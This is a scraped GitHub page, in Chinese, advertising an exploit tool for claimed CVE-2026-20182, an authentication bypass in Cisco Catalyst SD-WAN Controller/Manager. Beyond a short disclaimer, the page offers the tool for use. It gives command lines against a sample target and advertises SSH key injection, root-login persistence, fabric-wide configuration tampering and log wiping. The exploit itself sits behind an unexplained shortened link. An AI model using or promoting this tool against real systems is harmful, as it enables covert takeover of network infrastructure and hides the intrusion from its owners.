fangbarristerbar/CVE-2026-20182-POC

GitHub: fangbarristerbar/CVE-2026-20182-POC

针对 Cisco Catalyst SD-WAN Controller/Manager 的身份验证绕过漏洞利用工具,支持 SSH 密钥注入和 NETCONF 交互式控制。

Stars: 0 | Forks: 0

## CVE-2026-20182 Cisco Catalyst SD-WAN Controller / Manager 身份验证绕过 **免责声明** 此漏洞利用仅适用于经过明确书面授权的系统上的授权红队行动、渗透测试和安全研究。任何未经授权的使用都是非法的,并受到严格禁止。使用时请自行承担风险。 ### 概述 针对 CVE-2026-20182 的漏洞利用。绕过 Cisco Catalyst SD-WAN Controller 和 Manager 上 vdaemon 服务 (UDP/12346) 中的对等身份验证。授予未经身份验证的远程访问权限,作为高权限 `vmanage-admin` 内部账户。实现完整的 NETCONF 控制平面访问,并支持注入 SSH 密钥以进行长期访问。 ### 漏洞利用功能 - 通过格式错误的 DTLS 对等握手绕过身份验证 - 通过 `MSG_VMANAGE_TO_PEER` (类型 14) 注入 SSH 公钥 - 以 vmanage-admin 身份建立 NETCONF 会话 (TCP/830) - 可选的持久化和最小化日志清理 **功能特性:** - 整个 Fabric 范围内的配置操纵 - 策略 / OMP / VPN 更改 - 持久化 SSH 访问 - 交互式 NETCONF shell **受影响版本** 在以下列出的修复版本之前,所有 Cisco Catalyst SD-WAN Controller / Manager 版本均受此漏洞影响: | 版本 | 修复版本(s) | |-------------|-----------------------------------| | < 20.9 | 迁移至受支持的修复版本 | | 20.9 | 20.9.9.1 | | 20.10 | 20.12.7.1 | | 20.11 | 20.12.7.1 | | 20.12 | 20.12.5.4 / 20.12.6.2 / 20.12.7.1 | | 20.13 | 20.15.5.2 | | 20.14 | 20.15.5.2 | | 20.15 | 20.15.4.4 / 20.15.5.2 | | 20.16 | 20.18.2.2 | | 20.18 | 20.18.2.2 | | 26.1.1 | 26.1.1.1 | ### 用法 ``` python3 cve-2026-20182.py -t --key-file id_rsa.pub [--port 12346] [--netconf] ``` **选项:** - `-t, --target` – Controller/Manager IP 地址或主机名 - `--key-file` – 要注入的公钥路径(默认:自动生成) - `--persist` – 启用完全持久化(SSH + root 登录切换) - `--cmd` – 一次性 NETCONF 命令 (XML) - `--interactive` – 进入交互式 NETCONF shell - `--clean` – 注入后进行最小化日志擦除 示例: ``` python3 cve-2026-20182.py -t 192.168.100.10 --key-file mykey.pub --persist ``` 成功运行显示: ``` [+] Peering handshake bypass successful [+] Injected SSH key as vmanage-admin [+] NETCONF session established (session-id: 42) ``` **漏洞利用 - [链接](https://tinyurl.com/4suvc9tt)** 已在 20.12.6.2 和 20.15.4.4 版本上测试成功。
标签:Catalyst, CISA项目, Cisco, Cisco漏洞, CVE-2026-20182, DTLS, EXP, NETCONF, SD-WAN, SSH密钥注入, UDP协议, vdaemon, vmanage-admin, 内存分配, 协议分析, 后门, 子域名变形, 控制面访问, 权限提升, 网络安全, 认证绕过, 逆向工具, 隐私保护, 高成功利用